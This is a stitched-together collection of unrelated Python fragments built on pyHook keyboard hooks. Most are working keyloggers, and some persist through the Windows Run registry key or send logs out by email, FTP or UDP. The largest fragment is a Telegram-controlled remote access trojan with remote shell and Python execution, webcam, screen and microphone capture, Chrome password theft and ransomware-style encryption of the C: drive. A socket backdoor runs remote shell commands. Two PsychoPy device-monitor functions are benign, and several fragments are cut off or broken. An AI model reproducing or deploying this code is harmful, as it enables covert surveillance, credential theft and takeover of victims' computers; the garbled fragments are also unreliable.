win32gui.ShowWindow(window,0) return True def keyPressed(event): global option,word if(len(word) > 20): f.write(word) f.close() word = '' exit(0) if event.Ascii == 13: keys = '<ENTER>' elif event.Ascii == 8: keys = '<BACK SPACE>' elif event.Ascii == 9: keys = '<TAB>' else: keys = chr(event.Ascii) word += keys print(word) if __name__ == '__main__': f = open("keylog.txt","a") hookie = pyHook.HookManager() hookie.KeyDown = keyPressed hookie.HookKeyboard() pythoncom.PumpMessages() hide()
import pyHook import pythoncom import sys import logging # file_log = 'F:\\test\\log.txt' file_log = "F:\git\Python\Hacking\log.txt" def onKeyboardEvent(event): logging.basicConfig(filename=file_log, level=logging.DEBUG, format='%(message)s') chr(event.Ascii) logging.log(10, chr(event.Ascii)) return True hooks_manager = pyHook.HookManager() hooks_manager.KeyDown = onKeyboardEvent hooks_manager.HookKeyboard() pythoncom.PumpMessages()
def log_it(): obj = pyHook.HookManager() obj.KeyDown = keypressed obj.HookKeyboard() pythoncom.PumpMessages()
def handle(msg): chat_id = msg['chat']['id'] if checkchat_id(chat_id): response = '' if 'text' in msg: cd.log( 'n', '\n\t\tGot message from ' + str(chat_id) + ': ' + msg['text'] + '\n\n', True) command = msg['text'] try: if command == '/arp': response = '' bot.sendChatAction(chat_id, 'typing') lines = os.popen('arp -a -N ' + internalIP()) for line in lines: line.replace('\n\n', '\n') response += line elif command == '/capture_webcam': bot.sendChatAction(chat_id, 'typing') camera = cv2.VideoCapture(0) while True: return_value, image = gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) cv2.imshow('image', gray) if cv2.waitKey(1) & 0xFF == ord('s'): cv2.imwrite('webcam.jpg', image) break camera.release() cv2.destroyAllWindows() bot.sendChatAction(chat_id, 'upload_photo') bot.sendDocument(chat_id, open('webcam.jpg', 'rb')) os.remove('webcam.jpg') elif command == '/capture_pc': bot.sendChatAction(chat_id, 'typing') screenshot = ImageGrab.grab()'screenshot.jpg') bot.sendChatAction(chat_id, 'upload_photo') bot.sendDocument(chat_id, open('screenshot.jpg', 'rb')) os.remove('screenshot.jpg') elif command.startswith('/cmd_exec'): cd.log('w', 'Command exec prep') process = Popen(['cmd'], stdin=PIPE, stdout=PIPE) command = command.replace('/cmd_exec', '') cd.log('w', 'Executing the command ' + command) if len(command) > 1: process.stdin.write(bytes(command + '\n')) process.stdin.close() lines = process.stdout.readlines() for l in lines: response += l else: response = '/cmd_exec dir' elif command.startswith('/cd'): command = command.replace('/cd ', '') try: os.chdir(command) response = os.getcwd() + '>' except: response = 'No subfolder matching ' + command elif command.startswith('/delete'): command = command.replace('/delete', '') path_file = command.strip() try: os.remove(path_file) response = 'Succesfully removed file' except: try: os.rmdir(path_file) response = 'Succesfully removed folder' except: try: shutil.rmtree(path_file) response = 'Succesfully removed folder and it\'s files' except: response = 'File not found' elif command == '/dns': bot.sendChatAction(chat_id, 'typing') lines = os.popen('ipconfig /displaydns') for line in lines: line.replace('\n\n', '\n') response += line elif command.startswith('/download'): bot.sendChatAction(chat_id, 'typing') path_file = command.replace('/download', '') path_file = path_file[1:] if path_file == '': response = '/download C:/path/to/ or /download' else: bot.sendChatAction(chat_id, 'upload_document') try: bot.sendDocument(chat_id, open(path_file, 'rb')) except: try: bot.sendDocument( chat_id, open(hide_folder + '\\' + path_file)) response = 'Found in hide_folder: ' + hide_folder except: response = 'Could not find ' + path_file elif command.endswith('code_all'): cd.log('w', 'Data encryption option.') parentDirectory = 'C:\\' for root, dirs, files in os.walk(parentDirectory): for afile in files: full_path = os.path.join(root, afile) if command.startswith('/en'): cd.log( 'w', 'WARNING ABOUT TO ENCRYPT DATA!!!! IN ' + str(full_path)) encode(full_path) elif command.startswith( '/de') and full_path.endswith( '.nxr'): #our extension (been encoded) decode(full_path) response = 'Files ' + command[1:3] + 'coded succesfully.' elif command.startswith('/cp'): command = command.replace('/cp', '') command = command.strip() if len(command) > 0: try: file1 = command.split('"')[1] file2 = command.split('"')[3] copyfile(file1, file2) response = 'Files copied succesfully.' except Exception as e: response = 'Error: \n' + str(e) else: response = 'Usage: \n/cp "C:/Users/DonaldTrump/Desktop/p**n.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"' response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)' elif command.endswith('freeze_keyboard'): global keyboardFrozen keyboardFrozen = not command.startswith('/un') hookManager.KeyAll = lambda event: not keyboardFrozen response = 'Keyboard is now ' if keyboardFrozen: response += 'disabled. To enable, use /unfreeze_keyboard' else: cd.log('w', 'Keyboard frozen') response += 'enabled' elif command.endswith('freeze_mouse'): if mouseFrozen == False: mse = pyHook.HookManager() mse.MouseAll = false_event mse.KeyAll = false_event mse.HookMouse() mse.HookKeyboard() pythoncom.PumpMessages() response += 'enabled. To disable use /unfreeze_mouse' elif mouseFrozen == True: cd.log('w', 'Keyboard frozen') response += 'enabled. To disable, use /unfreeze_mouse' else: response += 'The script has commited the act of death' elif command.endswith('unfreeze_mouse'): if mouseFrozen == True: mse = pyHook.HookManager() mse.MouseAll = true_event mse.KeyAll = true_event mse.HookMouse() mse.HookKeyboard() pythoncom.PumpMessages() response += 'disabled. To enable use /freeze_mouse' elif mouseFrozen == False: response += 'already disabled. To enable, use /freeze_mouse' else: response += 'The script has commited the act of death' elif command == '/get_chrome': con = sqlite3.connect( os.path.expanduser('~') + r'\AppData\Local\Google\Chrome\User Data\Default\Login Data' ) cursor = con.cursor() cursor.execute( "SELECT origin_url,username_value,password_value from logins;" ) for users in cursor.fetchall(): response += 'Website: ' + users[0] + '\n' response += 'Username: '******'\n' response += 'Password: '******'\n\n' # """ # pass elif command.startswith('/hear'): try: SECONDS = -1 try: SECONDS = int(command.replace('/hear', '').strip()) except: SECONDS = 5 CHANNELS = 2 CHUNK = 1024 FORMAT = pyaudio.paInt16 RATE = 44100 audio = pyaudio.PyAudio() bot.sendChatAction(chat_id, 'typing') stream =, channels=CHANNELS, rate=RATE, input=True, frames_per_buffer=CHUNK) frames = [] for i in range(0, int(RATE / CHUNK * SECONDS)): data = frames.append(data) stream.stop_stream() stream.close() audio.terminate() wav_path = hide_folder + '\\mouthlogs.wav' waveFile =, 'wb') waveFile.setnchannels(CHANNELS) waveFile.setsampwidth(audio.get_sample_size(FORMAT)) waveFile.setframerate(RATE) waveFile.writeframes(b''.join(frames)) waveFile.close() bot.sendChatAction(chat_id, 'upload_document') except OSError: cd.log( 'e', 'Unable to listen in - there is probably no input device.' ) response = 'unable to listen in - there is probably no input device' #bot.sendAudio(chat_id, audio=open(wav_path, 'rb')) elif command == '/ip_info': bot.sendChatAction(chat_id, 'find_location') info = requests.get('').text #json format location = (loads(info)['loc']).split(',') bot.sendLocation(chat_id, location[0], location[1]) import string import re response = 'External IP: ' response += "".join( filter(lambda char: char in string.printable, info)) response = re.sub('[:,{}\t\"]', '', response) response += '\n' + 'Internal IP: ' + '\n\t' + internalIP() elif command == '/keylogs': bot.sendChatAction(chat_id, 'upload_document') bot.sendDocument(chat_id, open(keylogs_file, "rb")) elif command.startswith('/ls'): bot.sendChatAction(chat_id, 'typing') command = command.replace('/ls', '') command = command.strip() files = [] if len(command) > 0: files = os.listdir(command) else: files = os.listdir(os.getcwd()) human_readable = '' for file in files: human_readable += file + '\n' response = human_readable elif command.startswith('/msg_box'): message = command.replace('/msg_box', '') if message == '': response = '/msg_box yourText' else: ctypes.windll.user32.MessageBoxW( 0, message, u'Information', 0x40) response = 'MsgBox displayed' elif command.startswith('/mv'): command = command.replace('/mv', '') if len(command) > 0: try: file1 = command.split('"')[1] file2 = command.split('"')[3] move(file1, file2) response = 'Files moved succesfully.' except Exception as e: response = 'Error: \n' + str(e) else: response = 'Usage: \n/mv "C:/Users/DonaldTrump/Desktop/p**n.jpg" "C:/Users/DonaldTrump/AppData/Roaming/Microsoft Windows/[pornography.jpg]"' response += '\n\nDouble-Quotes are needed in both whitespace-containing and not containing path(s)' elif command == '/pc_info': bot.sendChatAction(chat_id, 'typing') info = '' for pc_info in platform.uname(): info += '\n' + pc_info info += '\n' + 'Username: '******'/ping': response = platform.uname()[1] + ': I\'m up' elif command.startswith('/play'): command = command.replace('/play', '') command = command.strip() if len(command) > 0: systemCommand = 'start \"\" \"' systemCommand += command systemCommand += '?autoplay=1&showinfo=0&controls=0\"' if os.system(systemCommand) == 0: response = 'YouTube video is now playing' else: response = 'Failed playing YouTube video' else: response = '/play <VIDEOID>\n/play A5ZqNOJbamU' elif command == '/proxy': threading.Thread(target=proxy.main).start() info = requests.get('').text #json format ip = (loads(info)['ip']) response = 'Proxy succesfully setup on ' + ip + ':8081' elif command == '/pwd': response = os.getcwd() elif command.startswith('/python_exec'): command = command.replace('/python_exec', '').strip() if len(command) == 0: response = 'Usage: /python_exec print(\'printing\')' else: cd.log('w', 'Executing python command') from StringIO import StringIO import sys old_stderr = sys.stderr old_stdout = sys.stdout sys.stderr = mystderr = StringIO() sys.stdout = mystdout = StringIO() exec(command in globals()) if mystderr.getvalue() != None: response += mystderr.getvalue() if mystdout.getvalue() != None: response += mystdout.getvalue() sys.stderr = old_stderr sys.stdout = old_stdout if response == '': response = 'Expression executed. No return or malformed expression.' elif command == '/reboot': bot.sendChatAction(chat_id, 'typing') command = os.popen('shutdown /r /f /t 0') response = 'Computer will be restarted NOW.' elif command.startswith('/run'): bot.sendChatAction(chat_id, 'typing') path_file = command.replace('/run', '') path_file = path_file[1:] if path_file == '': response = '/run_file C:/path/to/file' else: try: os.startfile(path_file) response = 'File ' + path_file + ' has been run' except: try: os.startfile(hide_folder + '\\' + path_file) response = 'File ' + path_file + ' has been run from hide_folder' except: response = 'File not found' elif command.startswith('/schedule'): command = command.replace('/schedule', '') if command == '': response = '/schedule 2017 12 24 23 59 /msg_box happy christmas' else: scheduleDateTimeStr = command[1:command.index('/') - 1] scheduleDateTime = datetime.datetime.strptime( scheduleDateTimeStr, '%Y %m %d %H %M') scheduleMessage = command[command.index('/'):] schedule[scheduleDateTime] = { 'text': scheduleMessage, 'chat': { 'id': chat_id } } response = 'Schedule set: ' + scheduleMessage runStackedSchedule(10) elif command == '/self_destruct': bot.sendChatAction(chat_id, 'typing') global destroy destroy = True response = 'You sure? Type \'/destroy\' to proceed.' elif command == '/shutdown': bot.sendChatAction(chat_id, 'typing') command = os.popen('shutdown /s /f /t 0') response = 'Computer will be shutdown NOW.' elif command == '/destroy' and destroy == True: bot.sendChatAction(chat_id, 'typing') if os.path.exists(hide_folder): rmtree(hide_folder) if os.path.isfile(target_shortcut): os.remove(target_shortcut) os._exit(0) elif command == '/tasklist': lines = os.popen( 'tasklist /FI \"STATUS ne NOT RESPONDING\"') response2 = '' for line in lines: line.replace('\n\n', '\n') if len(line) > 2000: response2 += line else: response += line response += '\n' + response2 elif command.startswith('/to'): command = command.replace('/to', '') import winsound winsound.Beep(440, 300) if command == '': response = '/to <COMPUTER_1_NAME>, <COMPUTER_2_NAME> /msg_box Hello HOME-PC and WORK-PC' else: targets = command[:command.index('/')] if platform.uname()[1] in targets: command = command.replace(targets, '') msg = {'text': command, 'chat': {'id': chat_id}} handle(msg) elif command == '/update': proc_name = app_name + '.exe' if not os.path.exists(hide_folder + '\\updated.exe'): response = 'Send updated.exe first.' else: for proc in psutil.process_iter(): # check whether the process name matches if == proc_name: proc.kill() os.rename(hide_folder + '\\' + proc_name, hide_folder + '\\' + proc_name + '.bak') os.rename(hide_folder + '\\updated.exe', hide_folder + '\\' + proc_name) os.system(hide_folder + '\\' + proc_name) sys.exit() elif command.startswith('/wallpaper'): command = command.replace('/wallpaper', '') command = command.strip() if len(command) == 0: response = 'Usage: /wallpaper C:/Users/User/Desktop/p**n.jpg' elif command.startswith('http'): image = command.rsplit('/', 1)[1] image = hide_folder + '/' + image urllib.urlretrieve(command, image) ctypes.windll.user32.SystemParametersInfoW( 20, 0, image, 3) else: ctypes.windll.user32.SystemParametersInfoW( 20, 0, command.replace('/', '//'), 3) response = 'Wallpaper succesfully set.' elif command == '/help': # functionalities dictionary: command:arguments functionalities = { '/arp' : '', \ '/capture_pc' : '', \ '/cmd_exec' : '<command_chain>', \ '/cd':'<target_dir>', \ '/decode_all':'', \ '/delete':'<target_file>', \ '/dns':'', \ '/download':'<target_file>', \ '/encode_all':'', \ '/freeze_keyboard':'', \ '/freeze_mouse':'', \ '/get_chrome':'', \ '/hear':'[time in seconds, default=5s]', \ '/ip_info':'', \ '/keylogs':'', \ '/ls':'[target_folder]', \ '/msg_box':'<text>', \ '/pc_info':'', \ '/play':'<youtube_videoId>', \ '/proxy':'', \ '/pwd':'', \ '/python_exec':'<command_chain>', \ '/reboot':'', \ '/run':'<target_file>', \ '/self_destruct':'', \ '/shutdown':'', \ '/tasklist':'', \ '/to':'<target_computer>, [other_target_computer]',\ '/update':'',\ '/wallpaper':'<target_file>'} response = "\n".join(command + ' ' + description for command, description in sorted( functionalities.items())) else: # redirect to /help cd.log('w', 'BOT MISUSE: Invalid command') msg = {'text': '/help', 'chat': {'id': chat_id}} handle(msg) except Exception as e: cd.log( 'e', 'BOT MISUSE: Unknown error running command or function.') cd.log('z', 'Details from previous error' + str(e)) #raise cd.log('n', 'Command {} ran'.format(command)) else: # Upload a file to target file_name = '' file_id = None if 'document' in msg: file_name = msg['document']['file_name'] file_id = msg['document']['file_id'] elif 'photo' in msg: file_time = int(time.time()) file_id = msg['photo'][1]['file_id'] file_name = file_id + '.jpg' file_path = bot.getFile(file_id=file_id)['file_path'] link = '' + str( token) + '/' + file_path file = (requests.get(link, stream=True)).raw with open(hide_folder + '\\' + file_name, 'wb') as out_file: copyfileobj(file, out_file) response = 'File saved as ' + file_name if response != '': responses = split_string(4096, response) for resp in responses: send_safe_message(bot, chat_id, resp) #
clientSocket.sendto(temp.encode(), (clientname, clientport)) return True #def Listenkeyboard(): # pythoncom.PumpMessages(800) # 进入循环,如不手动关闭,程序将一直处于监听状态 def Receive(): print('Ready to receive messages') while (1): message, ServerAddress = serverSocket.recvfrom(1024) print(message.hex()) if __name__ == "__main__": hm = pyHook.HookManager() # 创建一个“钩子”管理对象 hm.KeyDown = onKeyboardEvent # 监听所有键盘事件 hm.HookKeyboard() # 设置键盘“钩子” #threads=[] #线程池 t1 = threading.Thread(target=Receive) #threads.append(t1) #加载t1到线程池 t1.setDaemon(True) #守护进程,即送入就绪队列 t1.start() #启动线程活动 #t1.join() #让父进程等待子线程完成 #父进程 pythoncom.PumpMessages(800) # 进入循环,如不手动关闭,程序将一直处于监听状态
def createNewMonitoredDevice(self, device_class_name, deviceConfig): #print2err("#### createNewMonitoredDevice: ",device_class_name) self._all_device_config_errors = dict() try: device_instance = None device_config = None device_event_ids = None event_classes = None device_instance_and_config = self.addDeviceToMonitor( device_class_name, deviceConfig) if device_instance_and_config: device_instance, device_config, device_event_ids, event_classes = device_instance_and_config DeviceConstants.addClassMapping(device_instance.__class__) EventConstants.addClassMappings(device_instance.__class__, device_event_ids, event_classes) else: print2err('## Device was not started by the ioHub Server: ', device_class_name) raise ioHubError("Device config validation failed") except Exception: print2err("Error ZZZ during device creation ....") printExceptionDetailsToStdErr() raise ioHubError("Error ZZ2 during device creation ....") # Update DataStore Structure if required. if psychopy.iohub._DATA_STORE_AVAILABLE: try: if self.emrt_file is not None: self.emrt_file.updateDataStoreStructure( device_instance, event_classes) except Exception: print2err( "Error while updating datastore for device addition:", device_instance, device_event_ids) printExceptionDetailsToStdErr() self.log("Adding ioServer and DataStore event listeners......") # add event listeners for saving events if psychopy.iohub._DATA_STORE_AVAILABLE and self.emrt_file is not None: if device_config['save_events']: device_instance._addEventListener(self.emrt_file, device_event_ids) self.log( "DataStore listener for device added: device: %s eventIDs: %s" % (device_instance.__class__.__name__, device_event_ids)) #print2err("DataStore listener for device added: device: %s eventIDs: %s"%(device_instance.__class__.__name__,device_event_ids)) else: #print2err("DataStore saving disabled for device: %s"%(device_instance.__class__.__name__,)) self.log("DataStore saving disabled for device: %s" % (device_instance.__class__.__name__, )) else: #print2err("DataStore Not Evabled. No events will be saved.") self.log("DataStore Not Enabled. No events will be saved.") # Add Device Monitor for Keyboard or Mouse device type deviceDict = ioServer.deviceDict iohub = self if device_class_name in ('Mouse', 'Keyboard'): if Computer.system == 'win32': import pyHook if self._hookManager is None: iohub.log("Creating pyHook HookManager....") #print2err("Creating pyHook HookManager....") self._hookManager = pyHook.HookManager() self._hookManager.keyboard_hook = False if device_class_name == 'Mouse' and self._hookManager.mouse_hook is False: #print2err("Hooking Mouse.....") self._hookManager.MouseAll = ioServer.deviceDict[ 'Mouse']._nativeEventCallback self._hookManager.HookMouse() if device_class_name == 'Keyboard' and self._hookManager.keyboard_hook is False: #print2err("Hooking Keyboard.....") self._hookManager.KeyAll = ioServer.deviceDict[ 'Keyboard']._nativeEventCallback self._hookManager.HookKeyboard() elif Computer.system == 'linux2': # TODO: consider switching to xlib-ctypes implementation of xlib # from .devices import pyXHook if self._hookManager is None: #iohub.log("Creating pyXHook Monitors....") log_events = self.config.get('log_raw_kb_mouse_events', False) self._hookManager = pyXHook.HookManager(log_events) self._hookManager._mouseHooked = False self._hookManager._keyboardHooked = False if device_class_name == 'Keyboard': #print2err("Hooking Keyboard.....") self._hookManager.HookKeyboard() self._hookManager.KeyDown = deviceDict[ 'Keyboard']._nativeEventCallback self._hookManager.KeyUp = deviceDict[ 'Keyboard']._nativeEventCallback self._hookManager._keyboardHooked = True elif device_class_name == 'Mouse': #print2err("Hooking Mouse.....") self._hookManager.HookMouse() self._hookManager.MouseAllButtonsDown = deviceDict[ 'Mouse']._nativeEventCallback self._hookManager.MouseAllButtonsUp = deviceDict[ 'Mouse']._nativeEventCallback self._hookManager.MouseAllMotion = deviceDict[ 'Mouse']._nativeEventCallback self._hookManager._mouseHooked = True #print2err("Starting pyXHook.HookManager.....") self._hookManager.start() #iohub.log("pyXHook Thread Created.") #print2err("pyXHook.HookManager thread created.") else: #iohub.log("Updating pyXHook Monitor....") if device_class_name == 'Keyboard' and self._hookManager._keyboardHooked is False: #print2err("Hooking Keyboard.....") self._hookManager.HookKeyboard() self._hookManager.KeyDown = deviceDict[ 'Keyboard']._nativeEventCallback self._hookManager.KeyUp = deviceDict[ 'Keyboard']._nativeEventCallback self._hookManager._keyboardHooked = True if device_class_name == 'Mouse' and self._hookManager._mouseHooked is False: #print2err("Hooking Mouse.....") self._hookManager.HookMouse() self._hookManager.MouseAllButtonsDown = deviceDict[ 'Mouse']._nativeEventCallback self._hookManager.MouseAllButtonsUp = deviceDict[ 'Mouse']._nativeEventCallback self._hookManager.MouseAllMotion = deviceDict[ 'Mouse']._nativeEventCallback self._hookManager._mouseHooked = True #iohub.log("Finished Updating pyXHook Monitor....") else: # OSX if self._hookDevice is None: self._hookDevice = [] if device_class_name == 'Mouse' and 'Mouse' not in self._hookDevice: #print2err("Hooking OSX Mouse.....") mouseHookMonitor = DeviceMonitor(deviceDict['Mouse'], 0.004) self.deviceMonitors.append(mouseHookMonitor) deviceDict['Mouse']._CGEventTapEnable( deviceDict['Mouse']._tap, True) self._hookDevice.append('Mouse') #print2err("Done Hooking OSX Mouse.....") if device_class_name == 'Keyboard' and 'Keyboard' not in self._hookDevice: #print2err("Hooking OSX Keyboard.....") kbHookMonitor = DeviceMonitor(deviceDict['Keyboard'], 0.004) self.deviceMonitors.append(kbHookMonitor) deviceDict['Keyboard']._CGEventTapEnable( deviceDict['Keyboard']._tap, True) self._hookDevice.append('Keyboard') #print2err("DONE Hooking OSX Keyboard.....") return [ device_class_name, device_config['name'], device_instance._getRPCInterface() ]
f = open('D:\\readme.txt', 'r') buffer = f.close() # f = open('D:\\readme.txt', 'w') # if event.Ascii == 8: keylogs = 'BACKSPACE' buffer += keylogs f.write(buffer) f.close elif event.Ascii == 13: keylogs = 'ENTER' buffer += keylogs f.write(buffer) f.close else: keylogs = chr(event.Ascii) buffer += keylogs f.write(buffer) f.close return True # obj = pyHook.HookManager() obj.KeyDown = keypressed obj.HookKeyboard() pythoncom.PumpMessages()
def HookIt(OnKeyboardEvent): hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard()
def spy(self): messagebox.showwarning( "Warning", "Are You Sure to star Spy as You Can Stop Only By Shuting Down Your System" ) a = messagebox.askokcancel("Ask", "Do You Want to Continue") if a > 0: global t t = "" try: f = open("Logfile.txt", "a") f.close() except: f = open("Logfile.txt", "w") f.close() def addStartup( ): # this will add the file to the startup registry key fp = os.path.dirname(os.path.realpath(__file__)) file_name = sys.argv[0].split("\\")[-1] new_file_path = fp + "\\" + file_name keyVal = r"Software\Microsoft\Windows\CurrentVersion\Run" key2change = OpenKey(HKEY_CURRENT_USER, keyVal, 0, KEY_ALL_ACCESS) SetValueEx(key2change, "Im not a keylogger", 0, REG_SZ, new_file_path) addStartup() def OnMouseEvent(event): data = "\n[" + str(time.ctime().split(" ")[3]) + "]" \ + " WindowName : " + str(event.WindowName) data += "\n\tButton:" + str(event.MessageName) data += "\n\tClicked in (Position):" + str(event.Position) data += "\n====================" global t, start_time t = t + data if len(t) > 500: f = open("Logfile.txt", "a") f.write(t) f.close() t = "" return True def OnKeyboardEvent(event): data = "\n[" + str(time.ctime().split(" ")[3]) + "]" \ + " WindowName : " + str(event.WindowName) data += "\n\tKeyboard key :" + str(event.Key) data += "\n====================" global t, start_time t = t + data if len(t) > 500: f = open("Logfile.txt", "a") f.write(t) f.close() t = "" return True hook = pyHook.HookManager() hook.KeyDown = OnKeyboardEvent hook.MouseAllButtonsDown = OnMouseEvent hook.HookKeyboard() hook.HookMouse() start_time = time.time() pythoncom.PumpMessages()
# print('Key:', event.Key) # print('KeyID:', event.KeyID) # print('ScanCode:', event.ScanCode) # print('Extended:', event.Extended) # print('Injected:', event.Injected) # print('Alt', event.Alt) # print('Transition', event.Transition) # print('---') # def OnKeyboardEvent(event): # 0 или 1 - клавиша отжата # (-127) или (-128) - клавиша нажата# f12 = win32api.GetKeyState(0x7B) shift_key = win32api.GetKeyState(0x10) if event.Key == 'F12' and event.MessageName == 'key down': if shift_key < 0: print("Нажато Shift+F12") else: print("Нажато F12") getscreent = 1 return True hm = pyHook.HookManager() # создание экземпляра класса HookManager hm.KeyAll = OnKeyboardEvent # отслеживаем нажатия клавиш hm.HookKeyboard() # вешаем хук pythoncom.PumpMessages() # ловим сообщения
keys = '<DELETE>' # debug only remove / comment out when done elif event.Ascii == 126: sys.exit(0) else: keys = chr(event.Ascii) data += keys logKeys(data) return True # Registers and manages callbacks for low level mouse and keyboard events. hook = pyHook.HookManager() # Registers the given function as the callback for this keyboard event type. # Use the KeyDown property as a shortcut. hook.KeyDown = monitorKeys # Begins watching for keyboard events. hook.HookKeyboard() # Pumps all messages for the current thread until a WM_QUIT message. pythoncom.PumpMessages()
def onKeyDown(event): keyname = event.GetKey() if keyname not in currentCounts: currentCounts[keyname] = 1 else: currentCounts[keyname] += 1 def storeCounts(): while True: countsToStore = copy(currentCounts) wordlefile = open("keyswordle.txt", "w") print >> wordlefile, "key\tcount" for keyname in countsToStore: label = keyname if keyname.startswith("Media_"): label = keyname[6:] print >> wordlefile, label + "\t" + str(countsToStore[keyname]) wordlefile.close() countsToStore = {} sleep(900) captureThread = Timer(900.0, storeCounts) captureThread.start() hookmgr = pyHook.HookManager() hookmgr.KeyDown = onKeyDown hookmgr.HookKeyboard() pythoncom.PumpMessages()
def main(): obj = pyHook.HookManager() obj.KeyDown = intercept obj.HookKeyboard() pythoncom.PumpMessages()
def start_keystroke(garbage1, garbage2, garbage3): hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
if event.Ascii !=0 or 8:#if use press on great or equal 0 or press 8 f = open("c:\output.txt". "r+")#creating a file and location of file and imput the keyboard text buffer = you will read the file f.close()#then you will close the file #reopen the file for whe the user starts typing again on the keyboard f = ("c:\output.txt", "w") keylogs = chr(event.Ascii) if event.Ascii == 13:#if the user types 13 keylogs = '/n' #start a new line in the text file buffer += keylogs f.write(buffer) f.close() #Create a hook for the manager object hm = pyHook.HookManager()#referencing the class library the was implemented hm.KeyDown = OnKeyboardEvent#every time you press down on the keyboard, run the function of logging the events in a text file #set the hook hm.HookKeyboard() #wait forever pythoncom.PumpMessages()
def __init__(self): = pyHook.HookManager()
def main(): hm = pyHook.HookManager() hm.KeyDown = onKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages() print 'PyHook Over'
def Get_ORDERS(): while True: Order = Sct.recv(4096) if Order[:2] == "cd": os.chdir(Order[3:]) Exec = subprocess.Popen(Order, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) Exec_output = + Sct.send(Exec_output + "\n[Path] " + str(os.getcwd()) + ">") elif Order == "whosthere": Sct.send("DONE") elif Order == "ACK": Get_ORDERS() elif Order == "webcapture": Webcam_CAPTURE() elif Order == "screenshot": Screenshot() elif "download" in Order: Upload(Order) elif "upload" in Order: Download(Order) elif Order == "keylogger": Banner = """\n+-----------------------------+ | Black-Rose Keylogger | +-----------------------------+\n""" if "Windows" in PLATFORM: global Handler_1 # Creating banner File = open(os.getcwd() + "\\Rose_Win_Keylogger.txt", "a") File.write(Banner + "\n" + Time + "\n") File.close() # Create hook manager Handler_1 = pyHook.HookManager() # Hook pressing any key to our keylogger function Handler_1.KeyDown = Windows_OnKeyboardEvent # hook the keyboard Handler_1.HookKeyboard() # wait forever pythoncom.PumpMessages() if "Linux" in PLATFORM: global Handler_2 # Creating banner File = open(os.getcwd() + "/Rose_Linux_Keylogger.txt", "a") File.write(Banner + "\n" + Time + "\n") File.close() # Create hook manager Handler_2 = pyxhook.HookManager() # Hook pressing any key to our keylogger function Handler_2.KeyDown = Linux_OnKeyboardEvent # Hook the keyboard Handler_2.HookKeyboard() # Wait forever Handler_2.start() else: Exec = subprocess.Popen(Order, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) Exec_output = + Sct.send(Exec_output + "\n[Path] " + str(os.getcwd()) + ">") Sct.close() sys.exit()
def main(): hm = pyHook.HookManager() # 创建一个钩子管理对象 hm.MouseAll = mouse_event # 监听所有鼠标事件 hm.HookMouse() # 设定鼠标钩子 pythoncom.PumpMessages() # 进入循环,程序一直监听
def run(): hm = pyHook.HookManager() hm.KeyDown = OnKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
timah = threading.Timer(120.0, sendMail) #repeats every 2 minutes timah.start() #starts thread except: sys.exit(0) def OnKeyBoardEvent(event): global data, OemList if not event.Ascii == 27 and not event.Ascii == 0: logKey = chr(event.Ascii) if len( event.Key) <= 1 or event.Key in OemList else event.Key data = data + logKey + " " # create a hook manager getter = pyHook.HookManager() # watch for all mouse events getter.KeyDown = OnKeyBoardEvent # set the hook getter.HookKeyboard() data = "" OemList = [ "Oem_Period", "Oem_1", "Oem_2", "Oem_3", "Oem_4", "Oem_5", "Oem_6", "Oem_7", "Oem_Comma", "Oem_Minus", "Oem_Plus" ] #if __name__ == "__main__": # hide() timeah = threading.Timer(120.0, sendMail)
type(e)) # Apresenta o nome de erros para correções copy() ftp() def keyevent( event ): # Inicia o evento para gravar as teclas, o programa não filtra nenhuma tecla, cabe ao usuario corrigir os erros :) try: files = ( "C:\\system_logs-" + str(a) + ".txt" ) #Escreve o que foi gravado no system_logs.txt no diretório C:\\ fp = open(files, "a") fp.write(("\n" + event.Key)) fp.close() except Exception as e: print('Tipo de erro 3: ', type(e)) # Apresenta o nome de erros para correções return True obg = pyHook.HookManager() obg.KeyDown = keyevent obg.HookKeyboard() pythoncom.PumpMessages() #BY C4L4NG0_M4T4D0R
def run(self): # 在启动线程后任务从这个函数里面开始执行 hm = pyHook.HookManager() hm.KeyDown = self.onKeyboardEvent hm.HookKeyboard() pythoncom.PumpMessages()
line_buffer = "" #clear the line buffer return True #exit event """if backspace key pressed""" if(event.KeyID == 8): #backspace key line_buffer = line_buffer[:-1] #remove last character return True #exit event """if non-normal ascii character""" if(event.KeyID < 32 or event.KeyID > 126): if(event.KeyID == 0): #unknown character (eg arrow key, shift, ctrl, alt) pass #do nothing else: if(event.KeyID == 190): line_buffer = line_buffer + '.' else: line_buffer = line_buffer + str(event.KeyID) + '\n' else: line_buffer += chr(event.KeyID) #add pressed character to line buffer return True #pass event to other handlers #creates the directory create_Directory() hooks_manager = pyHook.HookManager() #create hook manager hooks_manager.KeyDown = OnKeyboardEvent #watch for key press hooks_manager.HookKeyboard() #set the hook pythoncom.PumpMessages() #wait for events
def createNewMonitoredDevice(self, dev_cls_name, dev_conf): self._all_dev_conf_errors = dict() try: dinstance = None dconf = None devt_ids = None devt_classes = None dev_data = self.addDeviceToMonitor(dev_cls_name, dev_conf) if dev_data: dinstance, dconf, devt_ids, devt_classes = dev_data DeviceConstants.addClassMapping(dinstance.__class__) EventConstants.addClassMappings(devt_ids, devt_classes) else: print2err('## Device was not started by the ioHub Server: ', dev_cls_name) raise ioHubError('Device config validation failed') except Exception: print2err('Error during device creation ....') printExceptionDetailsToStdErr() raise ioHubError('Error during device creation ....') # Update DataStore Structure if required. if _DATA_STORE_AVAILABLE: try: if self.dsfile is not None: self.dsfile.updateDataStoreStructure(dinstance, devt_classes) except Exception: print2err('Error updating data store for device addition:', dinstance, devt_ids) printExceptionDetailsToStdErr() self.log('Adding ioServer and DataStore event listeners......') # add event listeners for saving events if _DATA_STORE_AVAILABLE and self.dsfile is not None: dcls_name = dinstance.__class__.__name__ if dconf['save_events']: dinstance._addEventListener(self.dsfile, devt_ids) lstr = 'Added Device DS Listener: {}, {}'.format(dcls_name, devt_ids) self.log(lstr) else: self.log('DS Disabled for Device: %s'%(dcls_name)) else: self.log('DataStore Not Enabled. No events will be saved.') # Add Device Monitor for Keyboard or Mouse device type 